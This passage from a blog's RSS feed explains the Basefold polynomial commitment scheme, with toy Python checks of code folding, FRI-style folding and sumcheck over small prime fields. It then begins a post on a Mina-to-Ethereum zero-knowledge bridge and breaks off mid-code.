G_{k&#x2F;2,n&#x2F;2} T_{k&#x2F;2,n&#x2F;2} &amp;amp; G_{k&#x2F;2,n&#x2F;2}T^\prime_{k&#x2F;2,n&#x2F;2}&lt;br &#x2F;&gt;
\end{bmatrix}$$&lt;br &#x2F;&gt;
where $G_{k&#x2F;2,n&#x2F;2}$ is the generator matrix of the foldable linear $[n&#x2F;2, k&#x2F;2, d^\prime ]_\Sigma$-code.&lt;&#x2F;p&gt;
&lt;p&gt;For example, Reed-Solomon codes satisfy this property when instantiated over a multiplicative subgroup of size $n = 2^m$ (we also assume that $\rho = 2^{- \beta}$). If we choose a generator $g$ of the subgroup and represent the points as $\{ 1, g, g^2 , … , g^{n - 1} \}$, we have&lt;br &#x2F;&gt;
$$G_{k,n} = \begin{bmatrix}&lt;br &#x2F;&gt;
1 &amp;amp; 1 &amp;amp; 1 &amp;amp; 1 &amp;amp; \dots &amp;amp; 1 \newline&lt;br &#x2F;&gt;
1 &amp;amp; g &amp;amp; g^2 &amp;amp; g^3 &amp;amp; \dots &amp;amp; g^{n - 1} \newline&lt;br &#x2F;&gt;
1 &amp;amp; g^2 &amp;amp; g^4 &amp;amp; g^6 &amp;amp; \dots &amp;amp; g^{2(n - 1)} \newline&lt;br &#x2F;&gt;
1 &amp;amp; g^3 &amp;amp; g^6 &amp;amp; g^9 &amp;amp; \dots &amp;amp; g^{3(n - 1)} \newline&lt;br &#x2F;&gt;
\vdots &amp;amp; \vdots &amp;amp; \vdots &amp;amp; \vdots &amp;amp; \ddots &amp;amp; \vdots \newline&lt;br &#x2F;&gt;
1 &amp;amp; g^{k - 1} &amp;amp; g^{2(k - 1)} &amp;amp; g^{3(k - 1)} &amp;amp; \dots &amp;amp; g^{(k - 1) (n - 1)}&lt;br &#x2F;&gt;
\end{bmatrix}$$&lt;&#x2F;p&gt;
&lt;p&gt;Let’s reorder the matrix’s rows by placing first all the even-numbered rows, in increasing order, followed by all the odd-numbered rows. We get,&lt;br &#x2F;&gt;
$$G_{k,n} = \begin{bmatrix}&lt;br &#x2F;&gt;
1 &amp;amp; 1 &amp;amp; 1 &amp;amp; 1 &amp;amp; \dots &amp;amp; 1 \newline&lt;br &#x2F;&gt;
1 &amp;amp; g^2 &amp;amp; g^4 &amp;amp; g^6 &amp;amp; \dots &amp;amp; g^{2(n - 1)} \newline&lt;br &#x2F;&gt;
1 &amp;amp; g^4 &amp;amp; g^8 &amp;amp; g^{12} &amp;amp; \dots &amp;amp; g^{4(n - 1)} \newline&lt;br &#x2F;&gt;
\vdots &amp;amp; \vdots &amp;amp; \vdots &amp;amp; \vdots &amp;amp; \ddots &amp;amp; \vdots \newline&lt;br &#x2F;&gt;
1 &amp;amp; g &amp;amp; g^2 &amp;amp; g^3 &amp;amp; \dots &amp;amp; g^{n - 1} \newline&lt;br &#x2F;&gt;
1 &amp;amp; g^3 &amp;amp; g^6 &amp;amp; g^9 &amp;amp; \dots &amp;amp; g^{3(n - 1)} \newline&lt;br &#x2F;&gt;
1 &amp;amp; g^5 &amp;amp; g^{10} &amp;amp; g^{15} &amp;amp; \dots &amp;amp; g^{5(n - 1)} \newline&lt;br &#x2F;&gt;
\vdots &amp;amp; \vdots &amp;amp; \vdots &amp;amp; \vdots &amp;amp; \ddots &amp;amp; \vdots \newline&lt;br &#x2F;&gt;
1 &amp;amp; g^{k - 1} &amp;amp; g^{2(k - 1)} &amp;amp; g^{3(k - 1)} &amp;amp; \dots &amp;amp; g^{(k - 1) (n - 1)}&lt;br &#x2F;&gt;
\end{bmatrix}$$&lt;&#x2F;p&gt;
&lt;p&gt;We can see that the lower block (the odd-numbered rows) looks like the upper block, except that each column is scaled by a power of $g$: column one carries an extra factor $g$, column two a factor $g^2$, column three $g^3$, and so on. We have therefore broken the matrix into upper and lower parts; we still need to break each part into left and right halves.&lt;&#x2F;p&gt;
&lt;p&gt;If $g$ is a generator of a group of order $n$, then $\omega = g^2$ is a generator of a subgroup of order $n&#x2F;2$. As soon as we have something like $\omega^{n&#x2F;2}$ we wrap back to $1$. This breaks the upper half into two identical matrices, which correspond to $G_{k&#x2F;2, n&#x2F;2}$. In the lower half, the diagonal matrices are:&lt;br &#x2F;&gt;
$T_{ii} = g^i$&lt;br &#x2F;&gt;
$T^\prime_{ii} = g^{n&#x2F;2} g^i$&lt;br &#x2F;&gt;
But $g^{n&#x2F;2} = - 1$, so $T = - T^\prime$.&lt;&#x2F;p&gt;
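&lt;p&gt;We can check this folding structure numerically. The Python sketch below (our own toy example, with $\mathbb{F}_{17}$, a generator $g = 2$ of order $n = 8$, and $k = 4$) builds the Vandermonde matrix, reorders even- and odd-numbered rows, and verifies that the four blocks are $G_{k&#x2F;2,n&#x2F;2}$, $G_{k&#x2F;2,n&#x2F;2}$, $G_{k&#x2F;2,n&#x2F;2} T$ and $- G_{k&#x2F;2,n&#x2F;2} T$.&lt;&#x2F;p&gt;

```python
# Our own toy check of the foldable structure of the Reed-Solomon
# generator matrix, over F_17 with g = 2 of multiplicative order n = 8
# (so g^(n/2) = -1 mod 17).
p, g, n, k = 17, 2, 8, 4

def vandermonde(gen, rows, cols):
    return [[pow(gen, r * c, p) for c in range(cols)] for r in range(rows)]

G = vandermonde(g, k, n)
# Reorder rows: even-numbered rows first, then odd-numbered rows.
reordered = [G[r] for r in range(0, k, 2)] + [G[r] for r in range(1, k, 2)]

w = pow(g, 2, p)                           # generator of the order-n/2 subgroup
G_half = vandermonde(w, k // 2, n // 2)    # G_{k/2, n/2}
t = [pow(g, j, p) for j in range(n // 2)]  # diagonal of T

for r in range(k // 2):
    for j in range(n // 2):
        # Upper half: [ G_half | G_half ]
        assert reordered[r][j] == G_half[r][j]
        assert reordered[r][j + n // 2] == G_half[r][j]
        # Lower half: [ G_half T | -G_half T ], since g^(n/2) = -1
        assert reordered[r + k // 2][j] == G_half[r][j] * t[j] % p
        assert reordered[r + k // 2][j + n // 2] == (-G_half[r][j] * t[j]) % p
```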
&lt;p&gt;We see that foldable linear codes generalize this property we had in Reed-Solomon codes. There are, however, no restrictions on the generator matrices, other than fulfilling the foldable linear code definition. This lets us choose the diagonal matrices $T, T^\prime$ more freely and use non-FFT-friendly fields (this makes the Basefold PCS field-agnostic). In Basefold, they set the matrices $T = - T^\prime$, and their elements are sampled at random from the multiplicative group of the base field. We can construct the generator matrices inductively: choosing $G_0$ and $T_0 , T_0^\prime$ gives $G_1$, which, together with $T_1 , T_1^\prime$, leads to $G_2$, and so on. To encode a message $v$, we just compute $v \cdot G_d$. We can also encode $v$ in a recursive fashion,&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. If $d = 0$, $\mathrm{enc}_0 ( v ) = v.G_0$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Otherwise, split $v = (w_0 , w_1)$ into its first and second halves. Let $c_0 = \mathrm{enc}( w_0 )$, $c_1 = \mathrm{enc}( w_1 )$, $t = \mathrm{diagonal}(T)$ and compute $\mathrm{enc}(v) = (c_0 + c_1 \times t , c_0 - c_1 \times t)$, where $\times$ is the componentwise (Hadamard) product.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
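&lt;p&gt;The recursive encoding can be sketched in a few lines of Python. This is our own toy instance, with $\mathbb{F}_{101}$, the identity as $G_0$ (so the toy code has rate 1, unlike a real instantiation) and random nonzero diagonals for $T$, with $T^\prime = - T$.&lt;&#x2F;p&gt;

```python
# Our own toy instance of the recursive encoder above, over F_101, with
# the identity as G_0 (so this toy code has rate 1, unlike a real
# instantiation) and random nonzero diagonals t_i, i.e. T' = -T.
import random

p = 101
random.seed(0)
d = 3                                        # number of folding levels
# diags[i] is the diagonal of T at the level that doubles the codeword
# length from 2^i to 2^(i+1); its entries are random nonzero elements.
diags = [[random.randrange(1, p) for _ in range(2**i)] for i in range(d)]

def enc(v, level):
    if level == 0:
        return [v[0] % p]                    # G_0 = (1): trivial base code
    half = len(v) // 2
    c0 = enc(v[:half], level - 1)            # encode the first half
    c1 = enc(v[half:], level - 1)            # encode the second half
    t = diags[level - 1]
    left = [(a + b * ti) % p for a, b, ti in zip(c0, c1, t)]
    right = [(a - b * ti) % p for a, b, ti in zip(c0, c1, t)]
    return left + right

msg = [5, 7, 11, 13, 2, 3, 9, 4]             # message of length 2^d = 8
codeword = enc(msg, d)
assert len(codeword) == 2**d
```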
&lt;p&gt;The evaluation of a multilinear polynomial $p$ at $z$ can be turned into an evaluation check of $p$ at a random point via the &lt;a href=&quot;&#x2F;have-you-checked-your-sums&#x2F;&quot;&gt;sumcheck protocol&lt;&#x2F;a&gt;. FRI works in a similar way: the last value sent in FRI corresponds to the encoding of a random evaluation of the polynomial of the first round. Therefore, a PCS can be constructed by using a Merkle tree commitment to the encoding of some polynomial $p$. During evaluation, prover and verifier run in parallel the proximity test and the sumcheck protocol using the same set of challenges. The verifier can check that the evaluation of the polynomial corresponds to the last message of the prover in the proximity test.&lt;&#x2F;p&gt;
&lt;p&gt;Basefold’s proximity test works in the same way as FRI. We have a commit phase where the prover commits to lists of codewords&#x2F;evaluations and a query phase, where the verifier checks the consistency between the codewords. During the commitment phase,&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The prover starts with $\pi_d$, the encoding of some polynomial.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. For i = $d - 1$ to $0$  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;a. Receives the challenge $\alpha_i$ from the verifier.&lt;br &#x2F;&gt;
b. For every $j$ in $[0, n_i - 1]$, the prover computes the line $l_j (x)$ passing through $(T_i [j,j] , \pi_{i+1} [j])$ and $(-T_i [j,j] , \pi_{i+1} [j + n_i ])$ and sets $\pi_i [j] = l_j (\alpha_i )$&lt;br &#x2F;&gt;
c. The prover commits to $\pi_i$.&lt;&#x2F;p&gt;
&lt;p&gt;This commit phase is, in fact, identical to FRI. We start with the evaluations of the composition polynomial, $f$ (which is the Reed-Solomon encoding of the polynomial), to which we committed previously. We sample the folding challenge $\alpha_i$ and then obtain the following function, $l(x) = (f(x_0 ) + f( - x_0 ))&#x2F;2 + x (f( x_0 ) - f( - x_0))&#x2F;(2 x_0 )$. We can see that $l(x_0 ) = f( x_0 )$ and $l( - x_0 ) = f( - x_0 )$, which is essentially the line passing through those two points.&lt;&#x2F;p&gt;
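&lt;p&gt;A quick numerical check of this folding line, using an arbitrary cubic over $\mathbb{F}_{101}$ (our own example): the line interpolates $f$ at $\pm x_0$, and its value at the challenge $\alpha$ equals the folded polynomial $f_e (y) + \alpha f_o (y)$ at $y = x_0^2$.&lt;&#x2F;p&gt;

```python
# Our own numerical check of the folding line over F_101, for the
# arbitrary cubic f(x) = 3 + 5x + 7x^2 + 2x^3.
p = 101

def inv(a):
    return pow(a, p - 2, p)      # inverse via Fermat's little theorem

def f(x):
    return (3 + 5 * x + 7 * x**2 + 2 * x**3) % p

x0, alpha = 4, 29                # evaluation point and folding challenge
even = (f(x0) + f(-x0)) * inv(2) % p        # (f(x0) + f(-x0)) / 2
odd = (f(x0) - f(-x0)) * inv(2 * x0) % p    # (f(x0) - f(-x0)) / (2 x0)
l = lambda x: (even + x * odd) % p

# l is the line through (x0, f(x0)) and (-x0, f(-x0)):
assert l(x0) == f(x0)
assert l((-x0) % p) == f(-x0)
# Folding: l(alpha) equals f_e(y) + alpha * f_o(y) at y = x0^2, where
# f_e(y) = 3 + 7y and f_o(y) = 5 + 2y are the even and odd parts of f.
assert l(alpha) == (3 + 7 * x0**2 + alpha * (5 + 2 * x0**2)) % p
```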
&lt;p&gt;During the query phase,&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The verifier samples an index $i$ in $[0, n_{d - 1} - 1]$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. For $j = d - 1$ to $0$,  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;a. Queries $\pi_{j + 1} [i]$ and $\pi_{j + 1} [i + n_j ]$&lt;br &#x2F;&gt;
b. Computes the line $l_i (x)$ passing through those two points.&lt;br &#x2F;&gt;
c. Checks that $\pi_j [i] = l_i (\alpha_j )$&lt;br &#x2F;&gt;
d. If $j &amp;gt; 0$ and $i \geq n_{j - 1}$, set $i = i - n_{j - 1}$.
3. Finally, check whether $\pi_0$ is a valid codeword using the generator matrix $G_0$.&lt;&#x2F;p&gt;
&lt;p&gt;To reduce the soundness error, the verifier can query more indices, as we did in FRI. We are only lacking the evaluation protocols (prove and verify). To construct them, we need to use the sumcheck protocol together with the proximity test.&lt;&#x2F;p&gt;
&lt;p&gt;At the start of the protocol, the verifier has access to $\pi_d$, the encoding of the polynomial, the evaluation point, $z$ and the claimed evaluation, $v$. The protocol proceeds as follows:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The prover sends the univariate polynomial $h_d (x) = \sum_b f(b,x) eq_z (b,x)$ to the verifier.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. For $i = d - 1$ to $0$,  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;a. The prover runs the commit phase steps 2.a, 2.b, 2.c.&lt;br &#x2F;&gt;
b. If $i &amp;gt; 0$, the prover sends $h_i = \sum_b f(b,x, r_i , … , r_{d - 1} ) eq_z (b,x, r_i , … , r_{d - 1} )$.
3. The verifier:&lt;br &#x2F;&gt;
a. Runs the query phase of the proximity test.&lt;br &#x2F;&gt;
b. Performs all the checks in the sumcheck protocol.&lt;br &#x2F;&gt;
c. Verifies that $\mathrm{enc_0} (h_1 ( r_0 ) &#x2F; eq_z (r_0 , … , r_{d - 1} )) = \pi_0$&lt;&#x2F;p&gt;
&lt;p&gt;We see that the evaluation protocol basically consists of the sumcheck and proximity tests run concurrently.&lt;&#x2F;p&gt;
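&lt;p&gt;To see how the sumcheck half of the protocol operates, here is a minimal Python sketch (our own, with three variables over $\mathbb{F}_{101}$): since the polynomial is multilinear, each round message is a line, the verifier checks its values at $0$ and $1$ against the running claim, and the final claim must match the multilinear extension at the random point.&lt;&#x2F;p&gt;

```python
# Our own minimal sumcheck sketch for a 3-variable multilinear polynomial,
# given by its evaluation table on {0,1}^3, over F_101.
p = 101

def ml_eval(table, point):
    # Evaluate the multilinear extension by folding one variable at a time.
    t = list(table)
    for r in point:
        t = [(a + r * (b - a)) % p for a, b in zip(t[::2], t[1::2])]
    return t[0]

def sumcheck(table, challenges):
    claim = sum(table) % p          # the claimed sum over {0,1}^3
    t = list(table)
    for r in challenges:
        h0 = sum(t[::2]) % p        # round polynomial evaluated at 0
        h1 = sum(t[1::2]) % p       # round polynomial evaluated at 1
        assert (h0 + h1) % p == claim   # verifier's round check
        claim = (h0 + r * (h1 - h0)) % p
        t = [(a + r * (b - a)) % p for a, b in zip(t[::2], t[1::2])]
    return claim

table = [3, 1, 4, 1, 5, 9, 2, 6]
rs = [17, 42, 7]                    # verifier challenges, fixed for the demo
final_claim = sumcheck(table, rs)
# The last claim must equal the multilinear extension at the random point.
assert final_claim == ml_eval(table, rs)
```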
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;This post discussed a new commitment scheme, Basefold, which generalizes FRI. The main advantages over FRI are that the new commitment works better with multilinear polynomials and is field-agnostic. The construction can be instantiated with any foldable linear code. These are codes whose generator matrix has a given block structure. We will be adding this new commitment scheme to lambdaworks in the near future and compare its performance with other constructions.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Mina to Ethereum ZK bridge</title>
          <pubDate>Mon, 05 Feb 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/mina-to-ethereum-bridge/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/mina-to-ethereum-bridge/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/mina-to-ethereum-bridge/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;During the last few months, we have been developing a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;mina_bridge&quot;&gt;bridge between Mina and Ethereum&lt;&#x2F;a&gt;. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;minaprotocol.com&#x2F;&quot;&gt;Mina&lt;&#x2F;a&gt; is a layer-1 blockchain that uses zero-knowledge proofs (zk-SNARKs) to maintain its &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;minaprotocol.com&#x2F;blog&#x2F;22kb-sized-blockchain-a-technical-reference&quot;&gt;size at 22 kB&lt;&#x2F;a&gt;. The bridge serves two purposes:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Allowing cross-chain transactions seamlessly.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Allowing applications to leverage Mina&amp;#39;s zero-knowledge capabilities and expand their functionalities across multiple chains.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Thanks to the second point, users can simply prove things off-chain and verify them on-chain in Ethereum.&lt;&#x2F;p&gt;
&lt;p&gt;At its core, Mina uses a proof system called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;o1-labs.github.io&#x2F;proof-systems&#x2F;specs&#x2F;kimchi.html&quot;&gt;Kimchi&lt;&#x2F;a&gt;, which is a variant of Plonk with many optimizations and uses an inner product argument (IPA) polynomial commitment scheme. Its key optimizations are custom gates for foreign field addition and multiplication, Keccak, Poseidon, and lookup arguments. Above that, we have Pickles, which is Mina’s inductive SNARK composition, enabling a flexible way to have &lt;a href=&quot;&#x2F;incrementally-verifiable-computation-nova&#x2F;&quot;&gt;incrementally verifiable computation&lt;&#x2F;a&gt;. This construction allows us to generate a proof that attests to the validity of the transition from state $S_n$ to state $S_{n + 1}$ while checking a proof that the previous step was correct. While this helps Mina achieve its succinctness, verifying these proofs in Ethereum is very expensive.&lt;&#x2F;p&gt;
&lt;p&gt;Currently, pairing-based SNARKs (such as those using KZG) have cheaper verification costs in Ethereum, which makes this option attractive. To “wrap” Mina state proofs, we can generate a SNARK to verify a Mina proof obtained with IPA, using a variant of Kimchi with the KZG commitment scheme. To do so, we must first express all the verification logic of the Kimchi-IPA proof as a circuit, then use this circuit, the proof, and other public inputs to generate a proof using Kimchi-KZG. This is easier said than done. First, we must express all the verification operations as an arithmetic circuit. The good thing is that we can express even complex operations such as MSM using elliptic curve gates and lookup arguments. The bad thing is that the equations are expressed over Ethereum’s BN-254 scalar field, which differs from the Pasta fields. This means we will have to do many foreign field operations, making the SNARK quite expensive.&lt;&#x2F;p&gt;
&lt;p&gt;This post will provide an overview of the bridge, Kimchi, and the KZG verifier. For an introduction to some of the topics, see &lt;a href=&quot;&#x2F;all-you-wanted-to-know-about-plonk&#x2F;&quot;&gt;Plonk&lt;&#x2F;a&gt;, &lt;a href=&quot;&#x2F;ipa-and-a-polynomial-commitment-scheme&#x2F;&quot;&gt;IPA&lt;&#x2F;a&gt;, and &lt;a href=&quot;&#x2F;lookups&#x2F;&quot;&gt;lookups&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-bridge&quot;&gt;The Bridge&lt;&#x2F;h2&gt;
&lt;p&gt;The bridge has the following components:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. A backend service periodically wraps and posts Mina&amp;#39;s state proofs to an EVM chain.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. A &amp;quot;wrapping&amp;quot; module for Mina&amp;#39;s proofs to make them easy to verify on the EVM.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. The solidity logic for verifying the wrapped Mina state proofs in the EVM.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Browser utility for smart contracts.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. A solidity contract utility that smart contract developers or users can execute on an EVM chain to feed in a Mina state lookup proof that will check the state lookup against the latest posted Mina state proof to verify that this Mina state is valid.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The flow is shown in the following picture. For more details related to the architecture, see the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;mina_bridge&#x2F;blob&#x2F;main&#x2F;README.md&quot;&gt;bridge’s readme&lt;&#x2F;a&gt;.&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;HJ6DjwYcT.jpg&quot; alt=&quot;flow&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;snarks&quot;&gt;SNARKs&lt;&#x2F;h2&gt;
&lt;p&gt;As mentioned, Mina’s proof system is Kimchi, a modified version of Plonk, using IPA and working over a pair of elliptic curves, Pallas and Vesta (shortened to Pasta curves). IPA and Pasta curves enable easy recursion but at the expense of longer proofs than KZG-based SNARKs. Verifying and storing these proofs in Ethereum is expensive, so we need to obtain a new type of proof that can be checked less expensively in Ethereum. Let’s dive into Kimchi, Pickles, and KZG commitments.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;kimchi&quot;&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;o1-labs.github.io&#x2F;proof-systems&#x2F;kimchi&#x2F;overview.html&quot;&gt;Kimchi&lt;&#x2F;a&gt;&lt;&#x2F;h2&gt;
&lt;p&gt;This is a modified version of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2019&#x2F;953&quot;&gt;Plonk&lt;&#x2F;a&gt;. There are three types of arguments:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Custom gates.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Permutation.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Lookups.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;These arguments are translated into several polynomials, which must evaluate to zero over some set. Luckily, we can check that all the polynomials evaluate to zero over the set by doing a random linear combination. Say, for example, that $p_1 , p_2 , … , p_n$ all evaluate to zero over the set $S = \{ 1, 2, … , m \}$. We can have the verifier sample $\alpha$ and obtain&lt;br &#x2F;&gt;
$p (x) = \alpha p_1 (x) + \alpha^2 p_2 (x) + \dots + \alpha^n p_n (x)$&lt;br &#x2F;&gt;
which should also evaluate to zero over $S$. To see that the polynomial has that property, we can show that $p(x)$ is divisible by the polynomial vanishing on $S$, $Z_S (x)$. Another way to state this is that there is some polynomial $q(x)$ such that $p(x) = Z_S (x) q(x)$. Moreover, if we perform this check at just one random point $\zeta$ drawn from a very large set, then, with high probability, the equality holds over the whole set.&lt;&#x2F;p&gt;
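&lt;p&gt;The following Python sketch (our own toy example over $\mathbb{F}_{101}$, with $S = \{ 1, 2, 3 \}$) combines two polynomials vanishing on $S$ with powers of a random $\alpha$, divides by $Z_S$, and checks the identity $p(\zeta) = Z_S (\zeta) q(\zeta)$ at a random point.&lt;&#x2F;p&gt;

```python
# Our own toy example over F_101: combine polynomials vanishing on
# S = {1, 2, 3} with powers of alpha and check divisibility by Z_S.
p = 101

def pmul(a, b):
    out = [0] * (len(a) + len(b) - 1)
    for i, x in enumerate(a):
        for j, y in enumerate(b):
            out[i + j] = (out[i + j] + x * y) % p
    return out

def peval(a, x):
    return sum(c * pow(x, i, p) for i, c in enumerate(a)) % p

def pdivmod(a, b):
    # Long division by a monic divisor b; returns (quotient, remainder).
    a = list(a)
    q = [0] * (len(a) - len(b) + 1)
    for i in range(len(q) - 1, -1, -1):
        q[i] = a[i + len(b) - 1]
        for j, c in enumerate(b):
            a[i + j] = (a[i + j] - q[i] * c) % p
    return q, a[: len(b) - 1]

S = [1, 2, 3]
Z = [1]                              # Z_S(x) = (x - 1)(x - 2)(x - 3)
for s in S:
    Z = pmul(Z, [(-s) % p, 1])

p1 = pmul(Z, [1, 1])                 # Z_S * (x + 1): vanishes on S
p2 = pmul(Z, [0, 0, 1])              # Z_S * x^2:     vanishes on S
alpha = 29                           # "random" verifier challenge
comb = [(alpha * a + alpha * alpha * b) % p for a, b in zip(p1 + [0], p2)]

q, rem = pdivmod(comb, Z)
assert all(c == 0 for c in rem)      # the combination is divisible by Z_S
zeta = 77                            # "random" evaluation point
assert peval(comb, zeta) == peval(Z, zeta) * peval(q, zeta) % p
```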
&lt;p&gt;The ingredients are the circuit specification (the gates and the connections&#x2F;wirings) and the execution trace. The execution trace in Kimchi has input&#x2F;output registers (7) plus advice registers (8). The circuit is known beforehand and represents a given program&#x2F;computation. The execution trace depends on the particular execution of the program (for example, we can run the same program with different inputs).&lt;&#x2F;p&gt;
&lt;p&gt;The following tables describe the circuit:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Gates: Generic, Poseidon, Elliptic Curve Addition, Endo Scalar, Endo Scalar Multiplication, Scalar Multiplication, Range Check, Foreign Field Addition, Foreign Field Multiplication, Rotation, and XOR.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Coefficients. These are only used in Poseidon and generic gates.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Wirings (also Permutations or Sigmas)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Lookup tables&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Lookup selectors&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct CircuitGate&amp;lt;F: PrimeField&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; type of the gate&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub typ: GateType,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; gate wiring (for each cell, what cell it is wired to)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub wires: GateWires,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
